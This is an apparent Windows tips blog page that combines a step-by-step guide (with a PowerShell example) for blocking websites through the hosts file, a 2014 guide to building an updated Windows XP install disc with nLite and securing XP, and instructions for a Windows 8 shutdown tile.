Search for notepad

Step 3

Do not double click on Notepad, instead click on it once to select it and a row of options will appear along the bottom of the screen.

From this row of options click on “Run as administrator”.

Select Run As Administrator from bottom row of options

Step 4

A small ‘User Account Control’ window may appear asking if you want to proceed – click “Yes”.

You will be taken to the desktop environment with a blank notepad file open.

Confirm UAC warning

Step 5

From the row of options along the top of the notepad file, click on File and from the drop-down list that appears click on Open.

A window will open with a column of options on the left. From these options we are looking for the C drive. In some cases it may be labelled as Local Disk. In other cases it may have the name of the computer’s manufacturer.

Open - Select C drive

Step 6

When you have located the C drive, click it once to highlight it and a number of folders will be listed on the right.

Scroll down the folders listed and double-click on the ‘Windows’ folder.

Select Windows folder

Step 7

You will then be shown all of the folders within the Windows directory.

Scroll down again and this time double-click on the ‘System32’ folder.

Select System32 folder

Step 8

Within this folder, scroll through the available folders and double-click on ‘Drivers’.

Select Drivers folder

Step 9

This time you are looking for the ‘etc’ folder. Double-click on the ‘etc’ folder to open it and at first it may look like you have opened a blank folder.

Select etc folder

Step 10

Towards the bottom right corner of this window is an item labelled Text Documents (*.txt). Click on the arrow next to it and from the options listed click on ‘All files’.

Select All files from dropdown menu

Step 11

More files should now be listed – it is the ‘hosts’ file we are interested in.

Click on this file once to highlight it and then click Open.

Open the hosts file

Step 12

A notepad file should now open which is named ‘hosts’.

If you want to block access to a particular website, at the bottom of this file write the number:, press space-bar once and the enter the www address of the site you want to block.

For example if you wish to block Facebook type the following:

Notice that we DO NOT need to include a # symbol at the start of the line like the other lines in the file have.

Block access to Facebook

Step 13

At the top click File and then Save. Bring up your Internet browser to test the website.

If the details were entered correctly you should not be able to access that particular website.

If you wish to do the same with any other websites, simply access the hosts file again in the same way and add the other website address at the bottom of the file.

If you change your mind at any point, access the hosts file again, delete the line with the blocked website address and Save the hosts file again.

Unable to access website
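
The same edit can be scripted instead of made by hand in Notepad. The PowerShell below is an added example, not part of the original article: the function names are hypothetical, and the loopback address 127.0.0.1 is an assumed sink address, since the number itself does not appear in the text above.

```powershell
# Added example, not from the original article. Run from an elevated prompt.
$HostsPath = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'

function Get-ActiveHostsName {
    # Hypothetical helper: names on active lines; text after '#' is a comment.
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        $fields = @(($line -split '#', 2)[0].Trim() -split '\s+')
        if ($fields.Count -ge 2) { $fields[1..($fields.Count - 1)] }
    }
}

function Add-HostsBlock {
    param(
        [Parameter(Mandatory)][string[]]$Name,
        [string]$SinkAddress = '127.0.0.1',  # assumption: loopback sink address
        [string]$Path = $HostsPath
    )
    $lines = @(Get-Content -LiteralPath $Path)
    $known = @(Get-ActiveHostsName -Lines $lines)
    # Skip names that already have an entry so repeated runs add no duplicates.
    $new = @($Name | Where-Object { $known -notcontains $_ } |
             ForEach-Object { "$SinkAddress $_" })
    if ($new.Count -gt 0) {
        Copy-Item -LiteralPath $Path -Destination "$Path.bak" -Force  # rollback copy
        Set-Content -LiteralPath $Path -Value ($lines + $new) -Encoding ASCII
    }
    return $new
}

function Remove-HostsBlock {
    param([Parameter(Mandatory)][string[]]$Name, [string]$Path = $HostsPath)
    # Drop every active line that mentions one of the names; comment lines stay.
    $kept = @(Get-Content -LiteralPath $Path | Where-Object {
        $names = @(Get-ActiveHostsName -Lines $_)
        -not ($names | Where-Object { $Name -contains $_ })
    })
    Set-Content -LiteralPath $Path -Value $kept -Encoding ASCII
}

# Usage (hosts matches exact names, so list the bare and www forms separately):
#   Add-HostsBlock -Name 'www.facebook.com', 'facebook.com'
#   ipconfig /flushdns      # clear cached lookups, then test in the browser
#   Remove-HostsBlock -Name 'www.facebook.com', 'facebook.com'
```

`Add-HostsBlock` returns the lines it appended, so an empty result means every name already had an entry. `Remove-HostsBlock` deletes the whole line, including any other names that share it.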

Total Commander or Free Commander a must have Windows file Explorer alternatives

Whether you come from a Linux background and are forced to work with MS Windows, or you were born a Windows user and hold a strong dislike for Windows File Explorer, you will certainly appreciate some Windows Explorer alternative like…


How to change Outlook Signature – modify and delete Microsoft Outlook email signatures

I’ve been using Mozilla Thunderbird for the last 5 years of my life. Just now, at my new workplace at Hewlett Packard, in order to have well-functioning mail (with Exchange server), I started using Microsoft Outlook. Logically a little while after I started…


Windows XP after 8th of April

Microsoft has confirmed that all existing security patches and updates for Windows XP will still be available after support officially ends. This means that after the 8th April 2014, you’ll still be able to use Windows Update to download all existing security patches.

However, let’s create a Windows XP SP3 disc now for safekeeping.


First, you’ll need to download the Windows XP SP3 Network Installation Package, which is the standalone install for XP. Click the Download button and, when prompted, select Proceed with this download and click Next. Click No thanks and then Continue and the file will be downloaded to your hard disk. If you’re using Internet Explorer, you may have to click the security warning to allow the download; make sure you click Save, so that you keep the file.


Next, you need to download all of the Windows XP updates post SP3. It makes sense to do this after XP support has ended on the 8th April 2014, so that you get absolutely everything.

Fortunately, there’s a rather clever tool to do the job for you. Download the Updates Downloaded, Check and Add-on Creator (UDC) script. The page lists the date that the script was last updated, so make sure you grab one dated for the 8th of April or later, in order to catch the final XP updates.

Extract the Zip file, go into the UDC folder and run the latest UDC batch file. Follow the on-screen instructions, ignoring the warning about nLite (we’ll come to that next) and the file will download all of the updates to the current folder. It will take a while, so leave it to do its job. When completed, the window will go green. Move the files that start WindowsXP-WindowsMedia-KBxxxxxx-x86-ENU.exe into a temporary folder on your hard disk, otherwise you’ll find that XP gets stuck in an installation loop. We’ll show you how to copy these files to your new install disc later.


Now you need to download and install nLite. This clever bit of software is used to take your XP installation disc, SP3 and updates you’ve already downloaded, and create a brand-new XP installation disc with everything already applied.

When it’s installed run the software from the Start menu to start the wizard, which will take you through creating your new installation disc.


Click Next and you’ll be asked to provide the location of your Windows disc. This can either be an ISO file or you can just put your XP installation disc into your PC and browse to the drive.

Click OK and you’ll be prompted to select a folder to store the temporary files in. We created a folder called XP in the C: drive. Click OK, and the XP files will be copied to the temporary folder and nLite will show you which version of XP you have and the Service Pack version (if any) included. Browse to the folder you created and, inside it, create a new folder called Media Updates. Copy the update files you moved to a temporary folder in Step 1 into this folder. This will mean that the files will be copied to the installation disc, allowing you to run them manually later.


Click Next and you can load any previous nLite presets, if you have any. Click Next to select the additional files you want to create, so click Service Pack and Hotfixes, Add-ons and Update Packs. With nLite, you can also integrate additional drivers, select an unattended installation, which inputs your CD key automatically, and more, but we’re not going to cover that here. Instead, click Bootable ISO to tell nLite that you want to create an install disc. Click Next to go to the Service Pack selection screen.

Click Select and use Explorer to select the XP SP3 file you downloaded earlier and click Open. NLite will automatically slipstream the files into the installation. Click Next to go to the add-on screen. Click Insert and browse to the files you downloaded in Step 2. Press CTRL-A to select all (don’t worry about the files that aren’t updates, as nLite will deal with them automatically) and click Open. Click OK on any warning messages and click Next, then Yes to get nLite integrating the updates.


Once the process has completed, you’ll be told how big the new installation file is. In our case, it was 604.16MB, which should still fit on a blank CD; if yours is bigger than 640MB, you’ll need a blank DVD instead. Click Next to go to the Bootable ISO screen. NLite can write straight to disc, but we think it’s better to save the ISO file, so you can use it again and again. Leave the Mode as Create Image and click Make ISO. Select where you want to save the file and click Save. It will only take a short time to make the disc, which will be called WinLite.iso, although you can type any filename that you like.


You can now use the same dialog box to burn your installation CD, by selecting Direct Burn and clicking Next. Alternatively, if you’d rather do the job yourself, you can use any bit of disc burning software to burn your ISO to disc. We like CDBurnerXP, which you can download and install using the Ninite software.

Browse to your ISO file, right-click it and select Open With, CDBurnerXP. In the next dialog box, select your CD/DVD writer in the Target device drop-down menu, make sure you’ve inserted a blank disc and click Burn disc. You can now use this to install an up-to-date version of XP. Make sure you back up your new ISO, so you can create a new disc whenever you need it. You can now install Windows XP from your new disc, and manually apply the Media patches, too.


To stop flaws in Windows XP being exploited, you need to have proper security software installed on your computer. This will help negate the impact of no longer having security updates coming from Microsoft. You need to choose carefully, though, as your existing security might not be good enough.

Although Microsoft has said that Security Essentials, its free security package, will continue to get XP updates until July 2015, you shouldn’t rely on it, as it always comes near the bottom in our AV tests. Instead, you need to install decent security software to protect against threats.

If you want free protection, Avast! 2014 Free anti-virus is a far superior product. However, if you can, you should buy a security suite. Kaspersky Internet Security 2014 is our favourite security suite, blocking all the live threats we put against it. In addition, Kaspersky will detect many exploits, preventing criminals from being able to take over your computer.


As we pointed out, it can be other out-of-date bits of software that create security holes criminals can exploit. For this reason, you need to make sure that you keep all software completely up-to-date. A lot of software will automatically update itself, but not all will.

To save manually checking, you can use a free software updater instead. These scan your computer for installed applications, then check online to see if there’s a newer version available. There are a few programs out there, but Secunia PSI and Update Notifier are two of the best.


Device drivers have been known to contain security flaws, which can be exploited, so it’s important to keep these updated, too. There are free tools, such as Device Doctor, which will scan your computer for drivers and let you know if there’s an updated version available. Make sure you decline all the other bits of software Device Doctor asks you to install when you run its installation program.


If you’re using Internet Explorer under Windows XP, it’s time to stop. Windows XP only supports Internet Explorer 9, which means that it’s at least two versions out of date and vulnerable to some exploits.

Fortunately, both Google Chrome and Firefox have been continuously updated for Windows XP, so you can download the latest version and be confident that you’ll get future updates, too.


Java has had a bit of a kicking in recent times, with big failures in its security causing a lot of problems. One of the most sensible things you can do is disable Java from running in browsers, which means you can still run standalone Java-based apps, but your browser won’t run this content online. To do this go to the Control Panel and select Java from the Classic view. Click the Security tab and deselect the ‘Enable Java content in the browser’ tickbox. Click OK to apply the setting. You’ll be warned that you’ll need to restart your browsers for the changes to take effect.


Limited accounts are a great way to use Windows XP securely. As the name suggests, these accounts have restrictions on them, so they can’t install or remove all applications, or make system-wide changes, such as changing a hard disk’s partitions. However, a Limited account also means that software you encounter can’t do any of the above things, either. So, if you’re running a Limited account and run some malware, it will be as limited as you are.

There are a couple of tricks, which we’ll show you, for running things as Administrator when you need to. This means that you’re protected day to day, but you have Administrator tools ready when you need them.

To create a Limited account, first you need to log in as an Administrator and make sure the account has a password. Go to Control Panel, User Accounts and select your user account. Click Create a password and enter a new password twice. Enter a hint if you want, then click OK. Next click Home, then click Create a new account and give it a name, click Next, then select Limited and click Create Account. You’ve now got a Limited user account. You can set a password for it by following the steps at the start of this paragraph. You can now restart your computer and log in as the Limited account.

Create a Shutdown Shortcut for Windows 8

1. It starts, ironically, in Desktop mode, which you can reach by clicking/tapping the Desktop tile or pressing Win-D (that’s the Windows key and the letter D).

2. Right-click in any open spot on the desktop, then choose New, Shortcut.

3. We’re going to make a Shutdown shortcut, so in the location field, type shutdown /p and then click Next.

4. Choose a different name for the shortcut if you want, or leave it as “shutdown,” then click Finish.

5. Right-click the new shortcut and choose Pin to Start.

Presto! You’re done. The next time you return to the Start screen (aka Metro), you should see a Shutdown tile. One click or tap and your machine should immediately shut down.

You can also use this method to create a reboot tile. Just substitute the following text in step 3: shutdown /r /t 0. (That’s a zero at the end, and you shouldn’t include the period after it.)

Note that using the reboot tile will immediately reboot Windows, with no second-chance warning.